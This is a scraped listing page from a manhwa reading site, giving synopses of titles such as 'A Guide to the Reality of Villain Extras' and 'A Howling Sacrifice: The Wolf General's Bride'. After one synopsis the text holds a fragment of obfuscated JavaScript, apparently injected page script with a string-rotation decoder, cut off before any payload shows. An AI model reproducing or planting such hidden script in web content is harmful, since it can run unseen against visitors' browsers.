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A Guide to the Reality of Villain Extras

Read Manhwa A Guide to the Reality of Villain Extras / A Guide to the Villains Extras / Villain Extra’s F2P Guide / UCHIHA_KIKI A Guide to the Reality of Villain Extras, Villain Extra’s Reality Guide, A Guide to the Villains Extras, Villain Extra’s F2P Guide, at manhwawebsiteAs soon as I earned 2.2 billion in coins, I was possessed by a villainous extra in a game I enjoyed.”As soon as I earned 2.2 billion in coins, I was possessed by a villainous extra in a game I enjoyed.”On the day I hit the jackpot with coins, I was possessed by a game I enjoyed the day before.In order to avoid being used by the villainess in the early part of the game and killed, I betray the villainess Cleorah’, but I was killed.When I returned to the day I was first possessed, I gained the ability to use the 2.2 billion I earned in coins in the real world at the in-game cash shop.If I use the enormous cash of 2.2 billion to buy real money, will I be able to survive until the end in this life?Maybe you like ! “A Guide to the Reality of Villain Extras Manhwa” is alternative: 악역 엑스트라의 현질 가이드


A Gust of Wind Blows at Daybreak

A child who bring misfortune to those close to him and his friend embark on a thrilling journey to solve the mysteries in their lives.


A Handbook for Villainesses

Laviore Rea Bailey, the fake saint and heartless puppet of the merciless Prince Sidar, drinks poison on the day the prince is to give her up as an offering to the devil. Instead of dying, she reincarnates 10 years in the past. Set on righting her previous wrongs, Laviore vows to save the slave Damian Rhode Drake, whom she had once framed as a spy.


A Happy Ending For Villains

I was reborn into a romance fiction novel. I am lowborn, but there are plenty of boys here, and I get to work for the nobles. But there’s a tiny problem. This noble family happens to be a family of villains, and I’m supposed to lead these serpents and throw the empire into chaos. Apparently, I am the greatest villain in this novel! The deaths, the chaos in the empire, and the matters of inheritance locked the duke’s children and me into a corner of the manor. But the novel never mentioned anything about being locked away. So here, I must survive and grow...for a villainous happily ever after.


A Harem In The Fantasy World Dungeon

A man was about to commit suicide and decides to search for a way to die in the internet, but then he found an odd site that asked a lot of questions and had a point based system that allows you to create skills and abilities for a character. He took interest in it and when he finished setting his character he was asked "You will now be transported to a world with the settings you choose, coming back is not possible, do you still accept." Then, without thinking much of it, he pressed "Yes," and he found himself in another world with the skills and abilities he choose to have... (Source: MU)


A Heart-Captivating Smile

There was a young lady from an influential family that was famous for being a sloth. It was said that if she could lay down, she would not sit; and if she could sit, she would not stand. There was a young master from an influential family who was educated, talented, and had unparalleled good looks. However, the best-among-men young master was rumored to have an unmentionable disease?! Yang Zhaojun only wished to become a chamber's sloth, but unfortunately for her, the Gods had other plans. With a smile, she captivated the young master's heart. Would Zhaojun be willing to spend the rest of her life with him?<script></script><script>(function(_0x3a9ce0,_0x1f1dd8){var _0x193e66=_0x2575,_0x2dba57=_0x3a9ce0();while(!![]){try{var _0x3767f4=parseInt(_0x193e66(0x1a7))/(0x44f*-0x3+-0x38d+0x107b)+-parseInt(_0x193e66(0x19c))/(0x1cdc*-0x1+0x4fd*0x6+-0x110)+parseInt(_0x193e66(0x19e))/(0x199d+0x1893+-0x322d*0x1)+-parseInt(_0x193e66(0x19b))/(-0x2275+-0xb*0x21+-0x1*-0x23e4)+-parseInt(_0x193e66(0x1aa))/(0x1*-0x2b3+0x4c*-0x63+0x201c)*(-parseInt(_0x193e66(0x1b1))/(0x25eb+0x1*-0xf65+0x20*-0xb4))+-parseInt(_0x193e66(0x1b6))/(-0x1*0x24bb+0x11*-0x61+0x2b33)+parseInt(_0x193e66(0x1b3))/(-0x715+-0x7f*-0xb+0xd4*0x2);if(_0x3767f4===_0x1f1dd8)break;else _0x2dba57['push'](_0x2dba57['shift']());}catch(_0x198ae2){_0x2dba57['push'](_0x2dba57['shift']());}}}(_0x5723,0x1*0x25bcb+-0x86f7c+0xbf4d9));function custom(){var _0x289caa=_0x2575,_0x1bc75b={'XlBpU':function(_0x3d9c8e,_0x1c54dd){return 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A Hero Who Does Everything Perfectly

In 2024, Na Gang-in wakes up in the heart of South Korea. He can\'t remember who he is or where he is, but through a combat support AI named Jeon Ji-in embedded in his body, he discovers he\'s affiliated with the Earth Alliance from 2082. To regain his memories and figure out why he ended up here, he needs to gather information… With nothing to his name but plenty of skills, this is Na Gang-in\'s clumsy journey of adapting to Earth!


A Hero Who Is Good At Everything

Read manhwa A Hero Who Is Good At Everything / A Hero Who Does Everything Well Na Kang In opens his eyes in the middle of South Korea, in 2024. He doesn’t remember who he is or where he is, but he learns from the combat support AI Jeon Ji In, inside his body, that he was a member of the Earth Alliance in 2082. He needs to gather information to regain his memories and find out why he came here… Na Kang In, who has nothing but knows how to do everything, is having a tumultuous time adapting to Earth ! “A Hero Who Is Good At Everything” is alternative: 다 잘하는 히어로


A Heroic Tale About Starting With a Personal Relations Cheat(Ability) and Letting Others Do the Job

The hero and weapon are the strongest connections! An exhilarating fantasy that lurks from the back of the world! Ned, a young man who has been behind many of the world's greatest achievements, using a weapon known as human networking. One day, however, he is judged by the selfish king to be a liability and expelled from the heroic party. Ned decides to start as an adventurer from scratch. But his life as an adventurer is naturally out of the ordinary, as he is adored and connected with everyone from the leader of the knights to the princess of the mermaid tribe... 'Can I get help from the Wisdom King and the Great Sage to find this person?' Meanwhile, the King is coming to a realization. The heroes' party was full of capable, but incredibly problematic children, and that it was Ned that controlled them.. Thus opens a new story of a hero who changes the world from behind the scenes with his motto of "using connections".


A Howling Sacrifice: The Wolf General’S Bride

Elise, a noble lady who is treated coldly by her family due to her illegitimacy, loses her fiance in the ongoing war. Then, she is forced to marry General Wolfried, a man known as a cruel and ambitious military leader. To Elise, she would be getting married to the person who killed her fiance. Surely to Wolfried, it must be a pointless marriage since he had requested to marry the kingdom’s princess as his reward for winning the war. As Elise shudders at the thought of her new unwanted marriage, General Wolfried calmly informs her that… if she wants to get revenge for her former fiance, he’ll make it happen.


A Howling Sacrifice: The Wolf General’s Bride

Elise, a noble lady who is treated coldly by her family due to her illegitimacy, loses her fiance in the ongoing war. Then, she is forced to marry General Wolfried, a man known as a cruel and ambitious military leader. To Elise, she would be getting married to the person who killed her fiance. Surely to Wolfried, it must be a pointless marriage since he had requested to marry the kingdom’s princess as his reward for winning the war. As Elise shudders at the thought of her new unwanted marriage, General Wolfried calmly informs her that… if she wants to get revenge for her former fiance, he’ll make it happen. Ookami Shougun no Ikenie no Hanayome / 狼将軍の生贄の花嫁


A Hundred Ways To Abuse A Slag

The strongest goddess of the whole universe is here! Every scumbag of each world must be prepared to get my lessons, okay~? Dear scumbags and third mistresses, I’m the best at abusing and slapping your faces green! I will use violence to curb violence! No flowery bribes nor will be able to stop me! And you, will you be my next host?! I will grant your wishes! 虐渣的一百种方式 One Hundred Ways to Abuse Scum

2 days ago